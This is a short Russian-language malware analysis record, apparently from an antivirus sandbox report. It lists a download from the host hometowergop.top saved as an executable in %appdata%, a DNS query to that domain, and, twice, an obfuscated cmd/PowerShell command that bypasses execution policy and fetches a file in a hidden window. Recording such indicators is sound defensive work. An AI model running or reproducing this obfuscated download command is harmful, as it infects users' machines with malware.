Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^ERSh^e^L^L.EX^e^ -^eX^EcUt^IoNPo^LiCY bYPa^sS^ ^-^noPr^OF^I^Le ^-WiN^dOWStYLe hIDDeN ^(nEw-oB^j^Ect Sys^tem.NeT^.w^ebc^liE^nT^).D^OWn^lOad^F^il^E^('http://hometowergop.top/r...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^ERSh^e^L^L.EX^e^ -^eX^EcUt^IoNPo^LiCY bYPa^sS^ ^-^noPr^OF^I^Le ^-WiN^dOWStYLe hIDDeN ^(nEw-oB^j^Ect Sys^tem.NeT^.w^ebc^liE^nT^).D^OWn^lOad^F^il^E^('http://hometowergop.top/r...' (со скрытым окном)